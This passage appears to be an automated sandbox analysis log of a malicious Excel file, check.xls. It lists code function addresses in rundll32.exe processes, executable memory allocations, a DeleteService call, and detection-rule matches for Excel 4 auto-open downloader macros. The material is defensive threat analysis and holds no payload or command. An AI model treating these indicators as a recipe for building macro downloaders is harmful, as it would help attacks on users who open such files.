Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00824116 11_2_00824116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081B2C7 11_2_0081B2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081E2CC 11_2_0081E2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082A2E8 11_2_0082A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00812251 11_2_00812251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082D389 11_2_0082D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082E395 11_2_0082E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082C3A0 11_2_0082C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008313AD 11_2_008313AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00814346 11_2_00814346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00815361 11_2_00815361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008164E2 11_2_008164E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082F435 11_2_0082F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082044F 11_2_0082044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081E5CF 11_2_0081E5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008295FA 11_2_008295FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00828519 11_2_00828519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00815548 11_2_00815548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00822550 11_2_00822550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081A55F 11_2_0081A55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008266CA 11_2_008266CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081D6D8 11_2_0081D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00828606 11_2_00828606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082C631 11_2_0082C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082A666 11_2_0082A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00819714 11_2_00819714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00817735 11_2_00817735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082473C 11_2_0082473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081B74D 11_2_0081B74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082176B 11_2_0082176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00821889 11_2_00821889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00814816 11_2_00814816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008309B5 11_2_008309B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_008159F2 11_2_008159F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082894B 11_2_0082894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00818969 11_2_00818969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081EA99 11_2_0081EA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082AA30 11_2_0082AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00811A56 11_2_00811A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00819B83 11_2_00819B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00824B87 11_2_00824B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00827BA6 11_2_00827BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00829BCF 11_2_00829BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00812BD9 11_2_00812BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00828BE3 11_2_00828BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082DBEA 11_2_0082DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00820B19 11_2_00820B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082BB23 11_2_0082BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00818B3D 11_2_00818B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082CB5B 11_2_0082CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081BB7E 11_2_0081BB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00825CC4 11_2_00825CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082DCF7 11_2_0082DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00830C14 11_2_00830C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00817C37 11_2_00817C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082AC3A 11_2_0082AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00813C3C 11_2_00813C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00826C49 11_2_00826C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00814C5D 11_2_00814C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00819DCF 11_2_00819DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00827DD5 11_2_00827DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00826DF8 11_2_00826DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00816D24 11_2_00816D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081EE81 11_2_0081EE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082DEDC 11_2_0082DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00814EE3 11_2_00814EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00829EEC 11_2_00829EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081AEFB 11_2_0081AEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082BE27 11_2_0082BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00830E3A 11_2_00830E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00813E3F 11_2_00813E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00820E53 11_2_00820E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00815E60 11_2_00815E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0082AE6D 11_2_0082AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081DFF3 11_2_0081DFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00817FF2 11_2_00817FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_00830F33 11_2_00830F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 11_2_0081CF47 11_2_0081CF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A9011 12_2_001A9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A3C3C 12_2_001A3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B044F 12_2_001B044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B20BA 12_2_001B20BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AD6D8 12_2_001AD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AF8FD 12_2_001AF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B4116 12_2_001B4116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B473C 12_2_001B473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AAB87 12_2_001AAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001C13AD 12_2_001C13AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B95FA 12_2_001B95FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A7FF2 12_2_001A7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A59F2 12_2_001A59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001C0C14 12_2_001C0C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A4816 12_2_001A4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B0001 12_2_001B0001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B8606 12_2_001B8606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BAC3A 12_2_001BAC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A3E3F 12_2_001A3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001C0E3A 12_2_001C0E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BC631 12_2_001BC631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BAA30 12_2_001BAA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A7C37 12_2_001A7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BF435 12_2_001BF435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BBE27 12_2_001BBE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A4C5D 12_2_001A4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B0E53 12_2_001B0E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001C0056 12_2_001C0056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A2051 12_2_001A2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A2251 12_2_001A2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A1A56 12_2_001A1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B6C49 12_2_001B6C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B907F 12_2_001B907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BAE6D 12_2_001BAE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A5E60 12_2_001A5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BA666 12_2_001BA666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AF09B 12_2_001AF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AEA99 12_2_001AEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B1889 12_2_001B1889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AEE81 12_2_001AEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A70B3 12_2_001A70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BDEDC 12_2_001BDEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B66CA 12_2_001B66CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AE2CC 12_2_001AE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AB2C7 12_2_001AB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B5CC4 12_2_001B5CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AAEFB 12_2_001AAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BDCF7 12_2_001BDCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BA2E8 12_2_001BA2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B9EEC 12_2_001B9EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A64E2 12_2_001A64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A4EE3 12_2_001A4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B8519 12_2_001B8519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B0B19 12_2_001B0B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A9714 12_2_001A9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A8B3D 12_2_001A8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A7735 12_2_001A7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001C0F33 12_2_001C0F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BBB23 12_2_001BBB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A6D24 12_2_001A6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BCB5B 12_2_001BCB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AA55F 12_2_001AA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B2550 12_2_001B2550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B894B 12_2_001B894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A5548 12_2_001A5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AB74D 12_2_001AB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A4346 12_2_001A4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001ACF47 12_2_001ACF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001ABB7E 12_2_001ABB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B176B 12_2_001B176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A8969 12_2_001A8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A5361 12_2_001A5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AE991 12_2_001AE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BE395 12_2_001BE395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BD389 12_2_001BD389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A9B83 12_2_001A9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B4B87 12_2_001B4B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A51BB 12_2_001A51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001C09B5 12_2_001C09B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A81B7 12_2_001A81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BC3A0 12_2_001BC3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B7BA6 12_2_001B7BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A2BD9 12_2_001A2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B7DD5 12_2_001B7DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B9BCF 12_2_001B9BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001A9DCF 12_2_001A9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AE5CF 12_2_001AE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B6DF8 12_2_001B6DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001ADFF3 12_2_001ADFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001BDBEA 12_2_001BDBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001B8BE3 12_2_001B8BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FF8FD 13_2_006FF8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FAB87 13_2_006FAB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FE991 13_2_006FE991
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070907F 13_2_0070907F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F5E60 13_2_006F5E60
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070A666 13_2_0070A666
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070AE6D 13_2_0070AE6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00700E53 13_2_00700E53
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00710056 13_2_00710056
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F4C5D 13_2_006F4C5D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F1A56 13_2_006F1A56
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00706C49 13_2_00706C49
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F2051 13_2_006F2051
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F2251 13_2_006F2251
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070044F 13_2_0070044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070AA30 13_2_0070AA30
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070C631 13_2_0070C631
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070F435 13_2_0070F435
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070AC3A 13_2_0070AC3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00710E3A 13_2_00710E3A
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F3E3F 13_2_006F3E3F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F3C3C 13_2_006F3C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070BE27 13_2_0070BE27
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F7C37 13_2_006F7C37
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00710C14 13_2_00710C14
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00700001 13_2_00700001
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00708606 13_2_00708606
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F4816 13_2_006F4816
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F9011 13_2_006F9011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070DCF7 13_2_0070DCF7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F4EE3 13_2_006F4EE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F64E2 13_2_006F64E2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FAEFB 13_2_006FAEFB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070A2E8 13_2_0070A2E8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00709EEC 13_2_00709EEC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FE2CC 13_2_006FE2CC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FB2C7 13_2_006FB2C7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070DEDC 13_2_0070DEDC
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00705CC4 13_2_00705CC4
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FD6D8 13_2_006FD6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007066CA 13_2_007066CA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007020BA 13_2_007020BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F70B3 13_2_006F70B3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FEE81 13_2_006FEE81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FF09B 13_2_006FF09B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FEA99 13_2_006FEA99
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00701889 13_2_00701889
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F8969 13_2_006F8969
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F5361 13_2_006F5361
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FBB7E 13_2_006FBB7E
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070176B 13_2_0070176B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00702550 13_2_00702550
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FB74D 13_2_006FB74D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F5548 13_2_006F5548
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FCF47 13_2_006FCF47
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F4346 13_2_006F4346
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070CB5B 13_2_0070CB5B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FA55F 13_2_006FA55F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070894B 13_2_0070894B
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00710F33 13_2_00710F33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F6D24 13_2_006F6D24
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070473C 13_2_0070473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F8B3D 13_2_006F8B3D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070BB23 13_2_0070BB23
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F7735 13_2_006F7735
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00704116 13_2_00704116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00708519 13_2_00708519
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00700B19 13_2_00700B19
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F9714 13_2_006F9714
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00706DF8 13_2_00706DF8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007095FA 13_2_007095FA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00708BE3 13_2_00708BE3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070DBEA 13_2_0070DBEA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FDFF3 13_2_006FDFF3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F7FF2 13_2_006F7FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F59F2 13_2_006F59F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F9DCF 13_2_006F9DCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006FE5CF 13_2_006FE5CF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00707DD5 13_2_00707DD5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F2BD9 13_2_006F2BD9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00709BCF 13_2_00709BCF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007109B5 13_2_007109B5
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070C3A0 13_2_0070C3A0
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F51BB 13_2_006F51BB
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00707BA6 13_2_00707BA6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F81B7 13_2_006F81B7
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_007113AD 13_2_007113AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070E395 13_2_0070E395
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_006F9B83 13_2_006F9B83
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_00704B87 13_2_00704B87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 13_2_0070D389 13_2_0070D389
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00223C3C 14_2_00223C3C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00229011 14_2_00229011
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0023044F 14_2_0023044F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002320BA 14_2_002320BA
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0022F8FD 14_2_0022F8FD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0022D6D8 14_2_0022D6D8
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0023473C 14_2_0023473C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00234116 14_2_00234116
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002413AD 14_2_002413AD
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_0022AB87 14_2_0022AB87
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_00227FF2 14_2_00227FF2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002259F2 14_2_002259F2
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 14_2_002395FA 14_2_002395FA
Source: 27FA.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: C:\Windows\SysWOW64\rundll32.exe Process Stats: CPU usage > 98%
Source: check.xls Macro extractor: Sheet name: Macro1
Source: check.xls Macro extractor: Sheet name: Macro1
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 12_2_001AE249 DeleteService, 12_2_001AE249
Source: check.xls, type: SAMPLE Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: check.xls, type: SAMPLE Matched rule: INDICATOR_OLE_Excel4Macros_DL2 author = ditekSHen, description = Detects OLE Excel 4 Macros documents acting as downloaders
Source: C:\Users\user\Desktop\check.xls, type: DROPPED Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
